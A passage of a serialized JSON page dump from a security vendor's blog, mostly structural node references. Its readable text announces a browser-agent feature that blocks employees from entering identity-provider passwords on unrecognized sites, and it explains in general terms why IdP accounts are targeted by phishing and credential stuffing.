"content":235481},{},[235482],{"nodeType":178,"data":235483,"content":235484},{},[235485],{"nodeType":173,"value":230290,"marks":235486,"data":235487},[],{},{"nodeType":254,"data":235489,"content":235490},{},[235491],{"nodeType":178,"data":235492,"content":235493},{},[235494],{"nodeType":173,"value":230300,"marks":235495,"data":235496},[],{},{"nodeType":254,"data":235498,"content":235499},{},[235500],{"nodeType":178,"data":235501,"content":235502},{},[235503],{"nodeType":173,"value":230310,"marks":235504,"data":235505},[],{},{"nodeType":169,"data":235507,"content":235508},{},[235509],{"nodeType":173,"value":230317,"marks":235510,"data":235511},[],{},{"nodeType":178,"data":235513,"content":235514},{},[235515],{"nodeType":173,"value":230324,"marks":235516,"data":235517},[],{},{"nodeType":250,"data":235519,"content":235520},{},[235521,235534,235564,235587],{"nodeType":254,"data":235522,"content":235523},{},[235524],{"nodeType":178,"data":235525,"content":235526},{},[235527,235531],{"nodeType":173,"value":230337,"marks":235528,"data":235530},[235529],{"type":370},{},{"nodeType":173,"value":230342,"marks":235532,"data":235533},[],{},{"nodeType":254,"data":235535,"content":235536},{},[235537],{"nodeType":178,"data":235538,"content":235539},{},[235540,235544,235547,235551,235554,235561],{"nodeType":173,"value":230352,"marks":235541,"data":235543},[235542],{"type":370},{},{"nodeType":173,"value":3107,"marks":235545,"data":235546},[],{},{"nodeType":173,"value":230360,"marks":235548,"data":235550},[235549],{"type":370},{},{"nodeType":173,"value":230365,"marks":235552,"data":235553},[],{},{"nodeType":186,"data":235555,"content":235556},{"uri":230370},[235557],{"nodeType":173,"value":230373,"marks":235558,"data":235560},[235559],{"type":194},{},{"nodeType":173,"value":37,"marks":235562,"data":235563},[],{},{"nodeType":254,"data":235565,"content":235566},{},[235567],{"nodeType":178,"data":235568,"content":235569},{},[235570,235574,235577,235584],{"nodeType":173,"value":230387,"marks":235571,"data":235573},[235572],{"type":370},{},{"nodeType":173,"value":230392,"marks":235575,"data":235576},[],{},{"nodeType":186,"data":235578,"content":235579},{"uri":230397},[235580],{"nodeType":173,"value":230400,"marks":235581,"data":235583},[235582],{"type":194},{},{"nodeType":173,"value":230405,"marks":235585,"data":235586},[],{},{"nodeType":254,"data":235588,"content":235589},{},[235590],{"nodeType":178,"data":235591,"content":235592},{},[235593,235597],{"nodeType":173,"value":230415,"marks":235594,"data":235596},[235595],{"type":370},{},{"nodeType":173,"value":230420,"marks":235598,"data":235599},[],{},{"nodeType":178,"data":235601,"content":235602},{},[235603,235606,235612],{"nodeType":173,"value":230427,"marks":235604,"data":235605},[],{},{"nodeType":186,"data":235607,"content":235608},{"uri":75048},[235609],{"nodeType":173,"value":230434,"marks":235610,"data":235611},[],{},{"nodeType":173,"value":2340,"marks":235613,"data":235614},[],{},{"nodeType":169,"data":235616,"content":235617},{},[235618],{"nodeType":173,"value":40632,"marks":235619,"data":235620},[],{},{"nodeType":178,"data":235622,"content":235623},{},[235624],{"nodeType":173,"value":230450,"marks":235625,"data":235626},[],{},{"nodeType":178,"data":235628,"content":235629},{},[235630],{"nodeType":173,"value":230457,"marks":235631,"data":235632},[],{},{"nodeType":178,"data":235634,"content":235635},{},[235636],{"nodeType":173,"value":230464,"marks":235637,"data":235638},[],{},{"nodeType":178,"data":235640,"content":235641},{},[235642,235645,235652,235655,235662,235665,235672,235675,235682],{"nodeType":173,"value":230471,"marks":235643,"data":235644},[],{},{"nodeType":186,"data":235646,"content":235647},{"uri":181526},[235648],{"nodeType":173,"value":226380,"marks":235649,"data":235651},[235650],{"type":194},{},{"nodeType":173,"value":1464,"marks":235653,"data":235654},[],{},{"nodeType":186,"data":235656,"content":235657},{"uri":181538},[235658],{"nodeType":173,"value":230488,"marks":235659,"data":235661},[235660],{"type":194},{},{"nodeType":173,"value":230493,"marks":235663,"data":235664},[],{},{"nodeType":186,"data":235666,"content":235667},{"uri":70029},[235668],{"nodeType":173,"value":230500,"marks":235669,"data":235671},[235670],{"type":194},{},{"nodeType":173,"value":230505,"marks":235673,"data":235674},[],{},{"nodeType":186,"data":235676,"content":235677},{"uri":162243},[235678],{"nodeType":173,"value":230512,"marks":235679,"data":235681},[235680],{"type":194},{},{"nodeType":173,"value":230517,"marks":235683,"data":235684},[],{},{"nodeType":178,"data":235686,"content":235687},{},[235688],{"nodeType":173,"value":230524,"marks":235689,"data":235690},[],{},{"nodeType":231,"data":235692,"content":235693},{},[],{"nodeType":178,"data":235695,"content":235696},{},[235697],{"nodeType":173,"value":230534,"marks":235698,"data":235699},[],{},{"nodeType":312,"data":235701,"content":235704},{"target":235702},{"sys":235703},{"id":229805,"type":317,"linkType":318},[],{"nodeType":178,"data":235706,"content":235707},{},[235708],{"nodeType":173,"value":37,"marks":235709,"data":235710},[],{},{"items":235712},[235713,235715],{"sys":235714,"name":505},{"id":504},{"sys":235716,"name":509},{"id":508},{"items":235718},[235719],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":235720},{"url":8615},{"__typename":1528,"sys":235722,"content":235723,"title":236248,"synopsis":236249,"hashTags":118,"publishedDate":236250,"slug":236251,"tagsCollection":236252,"authorsCollection":236258},{"id":189461},{"json":235724},{"data":235725,"content":235726,"nodeType":165},{},[235727,235733,235739,235746,235753,235768,235801,235808,235816,235821,235836,235844,235850,235857,235864,235871,235878,235886,235893,235908,235924,235929,235936,235954,235972,235979,236002,236009,236032,236048,236055,236074,236081,236153,236160,236176,236183,236190,236197,236204,236220,236226,236232],{"data":235728,"content":235729,"nodeType":178},{},[235730],{"data":235731,"marks":235732,"value":37,"nodeType":173},{},[],{"data":235734,"content":235738,"nodeType":312},{"target":235735},{"sys":235736},{"id":235737,"type":317,"linkType":318},"5cseu1Cre2FrSQrIhSFxQw",[],{"data":235740,"content":235741,"nodeType":178},{},[235742],{"data":235743,"marks":235744,"value":235745,"nodeType":173},{},[],"Reliably detecting phishing sites is like trying to hit a moving target, as malicious websites and domains emerge, get taken down, and re-emerge continuously across the sprawl of the web.",{"data":235747,"content":235748,"nodeType":178},{},[235749],{"data":235750,"marks":235751,"value":235752,"nodeType":173},{},[],"Existing phishing prevention solutions have tried to solve the problem by protecting the inbox, a common (but not the only) attack vector, or by chasing lists of known-bad domains.",{"data":235754,"content":235755,"nodeType":178},{},[235756,235760,235765],{"data":235757,"marks":235758,"value":235759,"nodeType":173},{},[],"But these approaches have ",{"data":235761,"marks":235762,"value":235764,"nodeType":173},{},[235763],{"type":370},"two major shortcomings",{"data":235766,"marks":235767,"value":39946,"nodeType":173},{},[],{"data":235769,"content":235770,"nodeType":250},{},[235771,235786],{"data":235772,"content":235773,"nodeType":254},{},[235774],{"data":235775,"content":235776,"nodeType":178},{},[235777,235782],{"data":235778,"marks":235779,"value":235781,"nodeType":173},{},[235780],{"type":370},"Lack of coverage:",{"data":235783,"marks":235784,"value":235785,"nodeType":173},{},[]," Email-based phishing prevention tools can catch general spray-and-pray email phishing campaigns, but it only takes a small amount of tailoring to fly under their radar. The use of LLM tools to tailor phishing emails for their intended victims already makes this possible at scale. Email-based tools also fail to cover phishing attacks beyond the inbox, such as Slack and Teams phishing.",{"data":235787,"content":235788,"nodeType":254},{},[235789],{"data":235790,"content":235791,"nodeType":178},{},[235792,235797],{"data":235793,"marks":235794,"value":235796,"nodeType":173},{},[235795],{"type":370},"Expired intel:",{"data":235798,"marks":235799,"value":235800,"nodeType":173},{},[]," Tools that rely on known-bad domains always have an incomplete picture because a domain must be reported as malicious in order to get added to a blocklist. Meanwhile, attackers can spin up new sites or host phishing pages on existing sites by exploiting vulnerabilities in them, bypassing rules around preventing visits to newly registered domains. ",{"data":235802,"content":235803,"nodeType":178},{},[235804],{"data":235805,"marks":235806,"value":235807,"nodeType":173},{},[],"Using Push’s unique vantage point in the browser, we set out to attack this problem from a new angle. ",{"data":235809,"content":235810,"nodeType":178},{},[235811],{"data":235812,"marks":235813,"value":235815,"nodeType":173},{},[235814],{"type":370},"Instead of trying to detect phishing websites and domains that constantly change, we can now detect (and block!) phishing attempts based on directly observing user behavior in the browser.",{"data":235817,"content":235820,"nodeType":312},{"target":235818},{"sys":235819},{"id":227773,"type":317,"linkType":318},[],{"data":235822,"content":235823,"nodeType":178},{},[235824,235828,235832],{"data":235825,"marks":235826,"value":235827,"nodeType":173},{},[],"Our latest feature, ",{"data":235829,"marks":235830,"value":125683,"nodeType":173},{},[235831],{"type":370},{"data":235833,"marks":235834,"value":235835,"nodeType":173},{},[],", detects and blocks when a user enters their identity provider password on a webpage that does not belong to the IdP (e.g Okta, Google Workspace, Microsoft 365, etc.).",{"data":235837,"content":235838,"nodeType":178},{},[235839],{"data":235840,"marks":235841,"value":235843,"nodeType":173},{},[235842],{"type":370},"This means that even if that employee was the first person to get phished using a new attacker site, Push still detects it and blocks it.",{"data":235845,"content":235849,"nodeType":312},{"target":235846},{"sys":235847},{"id":235848,"type":317,"linkType":318},"4eCSQGec7mozFLDucNMO7m",[],{"data":235851,"content":235852,"nodeType":235},{},[235853],{"data":235854,"marks":235855,"value":235856,"nodeType":173},{},[],"How does it work?",{"data":235858,"content":235859,"nodeType":178},{},[235860],{"data":235861,"marks":235862,"value":235863,"nodeType":173},{},[],"Instead of detecting a phishing page based on a known-bad signature, the Push browser agent dynamically inspects user behavior and the attributes of the page itself.",{"data":235865,"content":235866,"nodeType":178},{},[235867],{"data":235868,"marks":235869,"value":235870,"nodeType":173},{},[],"The browser agent works by observing all logins and generating a salted partial hash of the user’s password, known as a fingerprint. This fingerprint is then stored locally to allow Push to perform comparisons. ",{"data":235872,"content":235873,"nodeType":178},{},[235874],{"data":235875,"marks":235876,"value":235877,"nodeType":173},{},[],"To detect potential phishing attacks, the browser agent compares the observed password fingerprint to known fingerprints for identity provider passwords that already exist in local storage. ",{"data":235879,"content":235880,"nodeType":178},{},[235881],{"data":235882,"marks":235883,"value":235885,"nodeType":173},{},[235884],{"type":370},"If an employee enters a known IdP password on a webpage that Push doesn’t recognize, Push blocks it. ",{"data":235887,"content":235888,"nodeType":178},{},[235889],{"data":235890,"marks":235891,"value":235892,"nodeType":173},{},[],"Once you’ve discovered a malicious site, use Push’s companion feature, URL blocking, to add the domain to a blocklist and prevent your other end-users from visiting the site. ",{"data":235894,"content":235895,"nodeType":178},{},[235896,235899,235905],{"data":235897,"marks":235898,"value":196087,"nodeType":173},{},[],{"data":235900,"content":235901,"nodeType":186},{"uri":183466},[235902],{"data":235903,"marks":235904,"value":155030,"nodeType":173},{},[],{"data":235906,"marks":235907,"value":196097,"nodeType":173},{},[],{"data":235909,"content":235910,"nodeType":178},{},[235911,235915,235920],{"data":235912,"marks":235913,"value":235914,"nodeType":173},{},[],"Push administrators can configure SSO password protection in Monitor, Warn, or Block modes to first observe how often employees are re-using IdP credentials on other sites, eliminating any false positives by adding them to an ignore list, and then turning on Warn or Block to ",{"data":235916,"marks":235917,"value":235919,"nodeType":173},{},[235918],{"type":370},"show a custom message",{"data":235921,"marks":235922,"value":235923,"nodeType":173},{},[]," that either provides a speedbump for users (“Are you sure this isn’t a phishing site?”) or prevents them from logging in altogether.",{"data":235925,"content":235928,"nodeType":312},{"target":235926},{"sys":235927},{"id":24862,"type":317,"linkType":318},[],{"data":235930,"content":235931,"nodeType":178},{},[235932],{"data":235933,"marks":235934,"value":235935,"nodeType":173},{},[],"Supported identity providers include Okta, Microsoft 365, Google Workspace, JumpCloud, Duo and Ping Identity. ",{"data":235937,"content":235938,"nodeType":178},{},[235939,235943,235950],{"data":235940,"marks":235941,"value":235942,"nodeType":173},{},[],"You can also ",{"data":235944,"content":235945,"nodeType":186},{"uri":114007},[235946],{"data":235947,"marks":235948,"value":235949,"nodeType":173},{},[],"get alerted",{"data":235951,"marks":235952,"value":235953,"nodeType":173},{},[]," via webhook when Push detects a suspected phishing event.",{"data":235955,"content":235956,"nodeType":178},{},[235957,235961,235969],{"data":235958,"marks":235959,"value":235960,"nodeType":173},{},[],"Learn more about how it works and the end-user experience in our ",{"data":235962,"content":235965,"nodeType":1698},{"target":235963},{"sys":235964},{"id":2405,"type":317,"linkType":318},[235966],{"data":235967,"marks":235968,"value":21642,"nodeType":173},{},[],{"data":235970,"marks":235971,"value":1477,"nodeType":173},{},[],{"data":235973,"content":235974,"nodeType":235},{},[235975],{"data":235976,"marks":235977,"value":235978,"nodeType":173},{},[],"But what about … ",{"data":235980,"content":235981,"nodeType":178},{},[235982,235986,235990,235993,235998],{"data":235983,"marks":235984,"value":235985,"nodeType":173},{},[],"Yes, we believe ",{"data":235987,"marks":235988,"value":182376,"nodeType":173},{},[235989],{"type":370},{"data":235991,"marks":235992,"value":933,"nodeType":173},{},[],{"data":235994,"marks":235995,"value":235997,"nodeType":173},{},[235996],{"type":370},"conditional access policies",{"data":235999,"marks":236000,"value":236001,"nodeType":173},{},[]," are important parts of a defense-in-depth strategy against phishing — in addition to protecting IdP credentials directly in the browser.",{"data":236003,"content":236004,"nodeType":178},{},[236005],{"data":236006,"marks":236007,"value":236008,"nodeType":173},{},[],"Here’s why MFA and conditional access policies aren’t enough:",{"data":236010,"content":236011,"nodeType":250},{},[236012,236022],{"data":236013,"content":236014,"nodeType":254},{},[236015],{"data":236016,"content":236017,"nodeType":178},{},[236018],{"data":236019,"marks":236020,"value":236021,"nodeType":173},{},[],"MFA is not infallible and not all MFA methods are created equal. Methods such as SMS, TOTP, or even push notifications are phishable. Even if your employees are also using more phishing-resistant forms of MFA, such as WebAuthn, it’s common for accounts to use multiple MFA methods and an attacker need only target the weakest one. An attacker in possession of an SSO password also has leverage to socially engineer an authentication reset, including an MFA reset.",{"data":236023,"content":236024,"nodeType":254},{},[236025],{"data":236026,"content":236027,"nodeType":178},{},[236028],{"data":236029,"marks":236030,"value":236031,"nodeType":173},{},[],"It’s worryingly common for us to deploy Push and find that a customer’s conditional access policies aren’t implemented as they are designed to be. The most common reason is that admins have to create so many exceptions to allow for real-world situations that policies become complex and full of gaps.",{"data":236033,"content":236034,"nodeType":178},{},[236035,236039,236044],{"data":236036,"marks":236037,"value":236038,"nodeType":173},{},[],"And of course, protecting ",{"data":236040,"marks":236041,"value":236043,"nodeType":173},{},[236042],{"type":1646},"all",{"data":236045,"marks":236046,"value":236047,"nodeType":173},{},[]," your organization’s passwords is important. In fact, we’re currently developing this feature further so it will do just that! We focus here on IdP passwords because they’re a higher-value target for attackers — and the frequent target of recent real-world attacks.",{"data":236049,"content":236050,"nodeType":235},{},[236051],{"data":236052,"marks":236053,"value":236054,"nodeType":173},{},[],"Why IdP accounts?",{"data":236056,"content":236057,"nodeType":178},{},[236058,236062,236070],{"data":236059,"marks":236060,"value":236061,"nodeType":173},{},[],"IdP accounts have been targeted in several high-profile recent attacks, like those carried out by Scattered Spider against MGM resorts and in the Retool breach. You can read more about them in our ",{"data":236063,"content":236066,"nodeType":1698},{"target":236064},{"sys":236065},{"id":202170,"type":317,"linkType":318},[236067],{"data":236068,"marks":236069,"value":195823,"nodeType":173},{},[],{"data":236071,"marks":236072,"value":236073,"nodeType":173},{},[]," blog article.",{"data":236075,"content":236076,"nodeType":178},{},[236077],{"data":236078,"marks":236079,"value":236080,"nodeType":173},{},[],"In the cloud-first world, a compromised IdP account is like a compromised user workstation. It gives an attacker a solid initial foothold from which they can operate:",{"data":236082,"content":236083,"nodeType":250},{},[236084,236106],{"data":236085,"content":236086,"nodeType":254},{},[236087],{"data":236088,"content":236089,"nodeType":178},{},[236090,236094,236103],{"data":236091,"marks":236092,"value":236093,"nodeType":173},{},[],"They instantly get access to all the apps the compromised user was accessing with SSO. It’s easy to move laterally to sensitive apps or to apps where the user has admin privileges. This obviously enables an attacker to directly exfiltrate data from these apps or to use them maliciously, as in the ",{"data":236095,"content":236098,"nodeType":1698},{"target":236096},{"sys":236097},{"id":202170,"type":317,"linkType":318},[236099],{"data":236100,"marks":236101,"value":236102,"nodeType":173},{},[],"Mandiant and SEC Twitter/X breaches",{"data":236104,"marks":236105,"value":1477,"nodeType":173},{},[],{"data":236107,"content":236108,"nodeType":254},{},[236109],{"data":236110,"content":236111,"nodeType":178},{},[236112,236116,236124,236128,236137,236140,236149],{"data":236113,"marks":236114,"value":236115,"nodeType":173},{},[],"Assuming an attacker hasn’t initially gotten access to a privileged IdP account, they can escalate their privileges by performing ",{"data":236117,"content":236120,"nodeType":1698},{"target":236118},{"sys":236119},{"id":228244,"type":317,"linkType":318},[236121],{"data":236122,"marks":236123,"value":63256,"nodeType":173},{},[],{"data":236125,"marks":236126,"value":236127,"nodeType":173},{},[]," on any low-risk app where the user is an admin or by using apps like ",{"data":236129,"content":236133,"nodeType":1698},{"target":236130},{"sys":236131},{"id":236132,"type":317,"linkType":318},"2rjLrCo6KWwLicfpV2qTOZ",[236134],{"data":236135,"marks":236136,"value":226380,"nodeType":173},{},[],{"data":236138,"marks":236139,"value":933,"nodeType":173},{},[],{"data":236141,"content":236145,"nodeType":1698},{"target":236142},{"sys":236143},{"id":236144,"type":317,"linkType":318},"2cv7Yq1DQpm1Mho7fKDs44",[236146],{"data":236147,"marks":236148,"value":226391,"nodeType":173},{},[],{"data":236150,"marks":236151,"value":236152,"nodeType":173},{},[]," to phish higher-privilege users.",{"data":236154,"content":236155,"nodeType":235},{},[236156],{"data":236157,"marks":236158,"value":236159,"nodeType":173},{},[],"It also protects against credential stuffing attacks",{"data":236161,"content":236162,"nodeType":178},{},[236163,236167,236172],{"data":236164,"marks":236165,"value":236166,"nodeType":173},{},[],"As well as protecting your users against phishing, the SSO password protection feature can prevent credential stuffing attacks succeeding against your IdP instance. How? By stopping your employees from reusing their SSO password on other apps.  \nPush monitors the identities of thousands of employees. Around ",{"data":236168,"marks":236169,"value":236171,"nodeType":173},{},[236170],{"type":370},"1 in 3 of them reuse passwords",{"data":236173,"marks":236174,"value":236175,"nodeType":173},{},[]," across multiple accounts. ",{"data":236177,"content":236178,"nodeType":178},{},[236179],{"data":236180,"marks":236181,"value":236182,"nodeType":173},{},[],"Employees know that their SSO password is one they’ll need to use a lot, and so they tend to choose one they know they will remember, because they are already using it successfully. That’s why we see higher levels of password reuse on IdP apps in particular.",{"data":236184,"content":236185,"nodeType":178},{},[236186],{"data":236187,"marks":236188,"value":236189,"nodeType":173},{},[],"Every time an SSO password is reused on another app, its exposure increases, along with the likelihood of it falling into the wrong hands. This can happen when another app experiences a breach and credentials are stolen. Or alternatively, when an attacker steals credentials in a phishing attack aimed at users of other apps where the password is being reused.",{"data":236191,"content":236192,"nodeType":178},{},[236193],{"data":236194,"marks":236195,"value":236196,"nodeType":173},{},[],"Armed with stolen credentials, an attacker can spray them across common cloud apps and see what additional accounts they can gain access to. IdP apps will be high on the list of cloud apps attackers will try because they provide much more in the way of access than a general SaaS user account.",{"data":236198,"content":236199,"nodeType":178},{},[236200],{"data":236201,"marks":236202,"value":236203,"nodeType":173},{},[],"You might be wondering if this feature can also be used to stop other password attacks such as password spraying and brute-forcing attacks. While this specific feature does not, Push’s other features do. ",{"data":236205,"content":236206,"nodeType":178},{},[236207,236211,236216],{"data":236208,"marks":236209,"value":236210,"nodeType":173},{},[],"These include ",{"data":236212,"marks":236213,"value":236215,"nodeType":173},{},[236214],{"type":370},"in-browser guidance",{"data":236217,"marks":236218,"value":236219,"nodeType":173},{},[]," that stops users from creating and using easily guessable passwords as well as Push’s ability to detect when employees are not registered for MFA (and whether the methods they are using are phishing-resistant or not).",{"data":236221,"content":236225,"nodeType":312},{"target":236222},{"sys":236223},{"id":236224,"type":317,"linkType":318},"uy6utpRA35spZFM7Da4Nt",[],{"data":236227,"content":236228,"nodeType":235},{},[236229],{"data":236230,"marks":236231,"value":71801,"nodeType":173},{},[],{"data":236233,"content":236234,"nodeType":178},{},[236235,236238,236244],{"data":236236,"marks":236237,"value":114452,"nodeType":173},{},[],{"data":236239,"content":236240,"nodeType":186},{"uri":473},[236241],{"data":236242,"marks":236243,"value":88194,"nodeType":173},{},[],{"data":236245,"marks":236246,"value":236247,"nodeType":173},{},[],". We’ll be happy to show you this feature, along with how we discover all the apps your employees are using and how we detect vulnerable identities.","Introducing SSO Password Protection: Stop employees’ IdP credentials being exposed or phished","Use the Push browser agent’s unique vantage point to protect SSO credentials by blocking employees from entering their password into any other site. ","2024-04-29T00:00:00.000Z","introducing-sso-password-protection",{"items":236253},[236254,236256],{"sys":236255,"name":509},{"id":508},{"sys":236257,"name":18399},{"id":18398},{"items":236259},[236260],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":236261},{"url":516},{"items":236263},[236264],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":236265},{"url":516},{"json":236267,"links":236594},{"nodeType":165,"data":236268,"content":236269},{},[236270,236276,236282,236287,236293,236299,236305,236311,236317,236323,236378,236383,236389,236395,236408,236414,236420,236426,236432,236438,236444,236453,236459,236464,236470,236476,236482,236488,236494,236499,236505,236521,236527,236533,236539,236578],{"nodeType":178,"data":236271,"content":236272},{},[236273],{"nodeType":173,"value":227513,"marks":236274,"data":236275},[],{},{"nodeType":178,"data":236277,"content":236278},{},[236279],{"nodeType":173,"value":227520,"marks":236280,"data":236281},[],{},{"nodeType":312,"data":236283,"content":236286},{"target":236284},{"sys":236285},{"id":227527,"type":317,"linkType":318},[],{"nodeType":169,"data":236288,"content":236289},{},[236290],{"nodeType":173,"value":227533,"marks":236291,"data":236292},[],{},{"nodeType":178,"data":236294,"content":236295},{},[236296],{"nodeType":173,"value":227540,"marks":236297,"data":236298},[],{},{"nodeType":178,"data":236300,"content":236301},{},[236302],{"nodeType":173,"value":227547,"marks":236303,"data":236304},[],{},{"nodeType":178,"data":236306,"content":236307},{},[236308],{"nodeType":173,"value":227554,"marks":236309,"data":236310},[],{},{"nodeType":178,"data":236312,"content":236313},{},[236314],{"nodeType":173,"value":227561,"marks":236315,"data":236316},[],{},{"nodeType":178,"data":236318,"content":236319},{},[236320],{"nodeType":173,"value":227568,"marks":236321,"data":236322},[],{},{"nodeType":250,"data":236324,"content":236325},{},[236326,236339,236352,236365],{"nodeType":254,"data":236327,"content":236328},{},[236329],{"nodeType":178,"data":236330,"content":236331},{},[236332,236336],{"nodeType":173,"value":227581,"marks":236333,"data":236335},[236334],{"type":370},{},{"nodeType":173,"value":227586,"marks":236337,"data":236338},[],{},{"nodeType":254,"data":236340,"content":236341},{},[236342],{"nodeType":178,"data":236343,"content":236344},{},[236345,236349],{"nodeType":173,"value":227596,"marks":236346,"data":236348},[236347],{"type":370},{},{"nodeType":173,"value":227601,"marks":236350,"data":236351},[],{},{"nodeType":254,"data":236353,"content":236354},{},[236355],{"nodeType":178,"data":236356,"content":236357},{},[236358,236362],{"nodeType":173,"value":227611,"marks":236359,"data":236361},[236360],{"type":370},{},{"nodeType":173,"value":227616,"marks":236363,"data":236364},[],{},{"nodeType":254,"data":236366,"content":236367},{},[236368],{"nodeType":178,"data":236369,"content":236370},{},[236371,236375],{"nodeType":173,"value":227626,"marks":236372,"data":236374},[236373],{"type":370},{},{"nodeType":173,"value":227631,"marks":236376,"data":236377},[],{},{"nodeType":312,"data":236379,"content":236382},{"target":236380},{"sys":236381},{"id":227638,"type":317,"linkType":318},[],{"nodeType":169,"data":236384,"content":236385},{},[236386],{"nodeType":173,"value":227644,"marks":236387,"data":236388},[],{},{"nodeType":178,"data":236390,"content":236391},{},[236392],{"nodeType":173,"value":227651,"marks":236393,"data":236394},[],{},{"nodeType":178,"data":236396,"content":236397},{},[236398,236401,236405],{"nodeType":173,"value":227658,"marks":236399,"data":236400},[],{},{"nodeType":173,"value":4892,"marks":236402,"data":236404},[236403],{"type":1646},{},{"nodeType":173,"value":227666,"marks":236406,"data":236407},[],{},{"nodeType":178,"data":236409,"content":236410},{},[236411],{"nodeType":173,"value":227673,"marks":236412,"data":236413},[],{},{"nodeType":178,"data":236415,"content":236416},{},[236417],{"nodeType":173,"value":227680,"marks":236418,"data":236419},[],{},{"nodeType":178,"data":236421,"content":236422},{},[236423],{"nodeType":173,"value":227687,"marks":236424,"data":236425},[],{},{"nodeType":169,"data":236427,"content":236428},{},[236429],{"nodeType":173,"value":227694,"marks":236430,"data":236431},[],{},{"nodeType":178,"data":236433,"content":236434},{},[236435],{"nodeType":173,"value":227701,"marks":236436,"data":236437},[],{},{"nodeType":178,"data":236439,"content":236440},{},[236441],{"nodeType":173,"value":227708,"marks":236442,"data":236443},[],{},{"nodeType":3769,"data":236445,"content":236446},{},[236447],{"nodeType":178,"data":236448,"content":236449},{},[236450],{"nodeType":173,"value":227718,"marks":236451,"data":236452},[],{},{"nodeType":178,"data":236454,"content":236455},{},[236456],{"nodeType":173,"value":227725,"marks":236457,"data":236458},[],{},{"nodeType":312,"data":236460,"content":236463},{"target":236461},{"sys":236462},{"id":227732,"type":317,"linkType":318},[],{"nodeType":169,"data":236465,"content":236466},{},[236467],{"nodeType":173,"value":227738,"marks":236468,"data":236469},[],{},{"nodeType":178,"data":236471,"content":236472},{},[236473],{"nodeType":173,"value":227745,"marks":236474,"data":236475},[],{},{"nodeType":178,"data":236477,"content":236478},{},[236479],{"nodeType":173,"value":227752,"marks":236480,"data":236481},[],{},{"nodeType":178,"data":236483,"content":236484},{},[236485],{"nodeType":173,"value":227759,"marks":236486,"data":236487},[],{},{"nodeType":178,"data":236489,"content":236490},{},[236491],{"nodeType":173,"value":227766,"marks":236492,"data":236493},[],{},{"nodeType":312,"data":236495,"content":236498},{"target":236496},{"sys":236497},{"id":227773,"type":317,"linkType":318},[],{"nodeType":235,"data":236500,"content":236501},{},[236502],{"nodeType":173,"value":227779,"marks":236503,"data":236504},[],{},{"nodeType":178,"data":236506,"content":236507},{},[236508,236511,236518],{"nodeType":173,"value":227786,"marks":236509,"data":236510},[],{},{"nodeType":186,"data":236512,"content":236513},{"uri":112017},[236514],{"nodeType":173,"value":227793,"marks":236515,"data":236517},[236516],{"type":194},{},{"nodeType":173,"value":227798,"marks":236519,"data":236520},[],{},{"nodeType":235,"data":236522,"content":236523},{},[236524],{"nodeType":173,"value":227805,"marks":236525,"data":236526},[],{},{"nodeType":178,"data":236528,"content":236529},{},[236530],{"nodeType":173,"value":227812,"marks":236531,"data":236532},[],{},{"nodeType":178,"data":236534,"content":236535},{},[236536],{"nodeType":173,"value":227819,"marks":236537,"data":236538},[],{},{"nodeType":250,"data":236540,"content":236541},{},[236542,236551,236560,236569],{"nodeType":254,"data":236543,"content":236544},{},[236545],{"nodeType":178,"data":236546,"content":236547},{},[236548],{"nodeType":173,"value":227832,"marks":236549,"data":236550},[],{},{"nodeType":254,"data":236552,"content":236553},{},[236554],{"nodeType":178,"data":236555,"content":236556},{},[236557],{"nodeType":173,"value":227842,"marks":236558,"data":236559},[],{},{"nodeType":254,"data":236561,"content":236562},{},[236563],{"nodeType":178,"data":236564,"content":236565},{},[236566],{"nodeType":173,"value":227852,"marks":236567,"data":236568},[],{},{"nodeType":254,"data":236570,"content":236571},{},[236572],{"nodeType":178,"data":236573,"content":236574},{},[236575],{"nodeType":173,"value":227862,"marks":236576,"data":236577},[],{},{"nodeType":178,"data":236579,"content":236580},{},[236581,236584,236591],{"nodeType":173,"value":227869,"marks":236582,"data":236583},[],{},{"nodeType":186,"data":236585,"content":236586},{"uri":473},[236587],{"nodeType":173,"value":88194,"marks":236588,"data":236590},[236589],{"type":194},{},{"nodeType":173,"value":227880,"marks":236592,"data":236593},[],{},{"entries":236595},{"hyperlink":236596,"inline":236597,"block":236598},[],[],[236599,236605,236611,236616],{"sys":236600,"__typename":127689,"title":236601,"youTubeUrl":236602,"imagePlaceholder":236603},{"id":227527},"Third-party breach investigation","https://www.youtube.com/watch?v=MGXGCjV7wNs",{"url":236604,"width":207245,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/23n4KrkUFTZlGQC6gFrlUe/65538da8c4296cd4ec56c270248df93b/image__18_.jpg",{"sys":236606,"__typename":5345,"title":236607,"caption":236608,"layoutMode":118,"file":236609},{"id":227638},"App search bar","Identifying users of the breached service, their last login dates, and authentication methods.",{"url":236610,"width":207245,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/5IhiiD9yOzU2jITWNrkrLo/dd5ea175613a2ed5d30f5a243fa2ec28/image__17_.png",{"sys":236612,"__typename":5345,"title":236613,"caption":236614,"layoutMode":118,"file":236615},{"id":227732},"Identifying vulnerable identities","Find other accounts using the same password that are potentially vulnerable to credential stuffing. ",{"url":236604,"width":207245,"height":49163},{"sys":236617,"__typename":15269,"type":112637,"ctaText":236618,"buttonLabel":93499,"buttonColour":152046,"buttonUrl":118},{"id":227773},"Check out all of our features, including SSO Password Protection and more","content:blog:investigating-and-responding-to-a-third-party-data-breach-using-push.json","blog/investigating-and-responding-to-a-third-party-data-breach-using-push.json","blog/investigating-and-responding-to-a-third-party-data-breach-using-push",{"_path":236623,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":236624,"ogImage":118,"summary":236626,"title":217833,"subtitle":118,"metaTitle":236636,"synopsis":217834,"hashTags":118,"publishedDate":217835,"slug":217836,"tagsCollection":236637,"relatedBlogPostsCollection":236643,"authorsCollection":238410,"content":238414,"_id":238835,"_type":5439,"_source":5440,"_file":238836,"_stem":238837,"_extension":5439},"/blog/the-web-proxy-is-dead-long-live-the-browser-extension",{"id":217358,"publishedAt":236625},"2026-03-27T20:13:25.229Z",{"json":236627},{"data":236628,"content":236629,"nodeType":165},{},[236630],{"data":236631,"content":236632,"nodeType":178},{},[236633],{"data":236634,"marks":236635,"value":217834,"nodeType":173},{},[],"Why browser data is best for identity threat 